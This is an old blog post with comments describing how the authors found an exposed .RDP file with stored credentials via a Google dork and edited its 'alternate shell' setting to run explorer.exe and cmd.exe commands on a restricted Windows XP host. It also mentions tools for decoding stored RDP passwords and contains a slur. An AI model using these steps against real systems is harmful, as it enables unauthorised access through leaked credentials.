::: Windows Remote Desktop :::
::: Command Execution Vuln. :::
::: Written by Koshi and Yousif Yalda :::
heykoshi[at]gmail[dot]com // Yousif[at]vapt-sec[dot]com
RDP Remote Command Execution / Priv-esc.
Disclaimer:
We are not to be held responsible for any use of this document other than it being educational.
We found this vuln. while trying to execute a few programs and commands on a Windows XP Sp2 System in which the administrator had disabled pretty much everything....command prompt, right clicking, execution of any program besides a few that he/she had given the rights to. The only access we had was a .RDP file we had found on Google. Within this file was a username and a password. No wonder this system was so restricted, its in plain view with a username and password just waiting to be hit. So I tried to hit it, no luck with anything but the following...
Below is a .RDP file saved by Windows
Some things have been changed and
removed for the sake of the original owners.
( username/password(s) have been removed )
( server has been changed for this as well )
##################################################### <--- Sniff these up..
screen mode id:i:1
desktopwidth:i:800
desktopheight:i:600
session bpp:i:16
winposstr:s:0,3,0,0,800,572
full address:s:SERVERADDRESS Ex. 127.0.0.1
compression:i:1
keyboardhook:i:2
audiomode:i:0
redirectdrives:i:0
redirectprinters:i:1
redirectcomports:i:0
redirectsmartcards:i:1
displayconnectionbar:i:1
autoreconnection enabled:i:1
domain:s:DOMAINNAMEHERE
alternate shell:s:C:\vSoftware\vsoft.exe
shell working directory:s:C:\vSoftware\
disable wallpaper:i:1
disable full window drag:i:1
disable menu anims:i:1
disable themes:i:0
disable cursor setting:i:0
bitmapcachepersistenable:i:1
password 51:b:MS_ENCODED_PASSWORD ( there are tools for decrypting this type of password )
##################################################### <--- Sniff these up..
Well that is the .RDP file, almost exactly like it was when we found it.
Upon entering this system, I was shown a piece of software made by the company that the system I was auditing was owned by. I had no Desktop, no Start Menu, nothing.
See where it says "alternate shell:s:C:\vSoftware\vsoft.exe"
and "shell working directory:s:C:\vSoftware\" ?
Well that is where the vulnerability lies......
Change, "alternate shell:s:" to like
alternate shell:s:explorer.exe
Then suddenly you have a start menu, and possibly a File/Web browser.. Fair enough given this harsh environment of restrictions...
now...change it to
alternate shell:s:cmd.exe /C dir /s /l /b C:\*.* && pause
You can now watch the entire file tree of C:\ scroll on the screen...
...even if you don't have the rights to do so....
You can play with the "shell working directory:s:" if you'd like, as that is where your commands will be executed...and be sure to use the && pause. The command prompt is disabled, so the command prompt closes right after your command completes.
Notes:
Account access IS required of some sort.
Some commands may still be restricted.
This ONLY effects Microsoft Terminal Services / Remote Desktop Protocol, no others.
None the less, this should NOT be happening.
As for fixing this bug, I'm not quite sure.
I can see how in a lot of situations this is hardly anything useful...
...but for systems with limitations...this bypasses a lot.
I don't know....go play with it. Don't be a dick....
Oh...I mentioned I found that file on Google, right?
dork: "password" filetype:rdp
------------------------------------
-Dedicated to Lucky225, McGrew and any other faggot who loves to hate. (not the exploit, the song)
9 comments:
Very interesting what google turns up. So is this sort of like a privilege escalation and information disclosure vulnerability? I do not know much about rpd files. Very interesting.
@ digitaldefacer, that's exactly what it is, a disclosure vulnerability that allows for priv. escalation.
Identifying Characters (ASCII):
Genvoc.otp
Identifying Characters (Hex):
Asxots.csp
Program registry ID:
P.I.T
RPD MIME Type:
Coded
It looks like fun doesn't it? It would seem you're finding more loops through trial and error, too bad they haven't learned themselves. Keep up the good work, Team.
GodFather
Wow, proof that companies still haven't learned plaintext is unacceptable. But then again, we still have stuff like plain POP3 and telnet in use...
Very interesting but even though I found many tools to decrypt rdp passwords as supposed by your post (like cain, rdp pass view and others), no one give me success ...
Which one is reliable enough to accomplish this step?
@ jer001, Hmm, not sure Cain should work just fine, but here's what I used http://www.oxid.it/ca_um/topics/remote_desktop_password_decoder.htm
lol... haven't i seen this somewhere before? wait -- i recall seeing this old ass shit like 2 or 3 years ago on pheer dot org...
http://ph33r.org/updates/2006/6/5/windows-xp-privilege-escalation-exploit.html
http://www.projectstreamer.com/users/r0t0r00t3r/xp_priv_esc-1/xp_priv_esc.html
i forwarded your blog post on this foolishness to the url above. hopefully they too will expose you for the *LAMER* that you are.
-ANONYMOUS
@ Anonymous, identify yourself if you are truly anyone someone should listen to, if you exist. This has been discovered by Koshi and me, and we aren't aware of this posted elsewhere, so give up. Also, I looked at the video and it seems like it has been made recently, about a day ago. Nice try, but just continue to fail because I know you are.
First off, this is neither a "vulnerability" in RDP nor have you illustrated any "privilege escalation."
If there is an "issue" here, it is that the admin for the company published an RDP file to the internet that had stored credentials to access a publically assessable RDP host
Post a Comment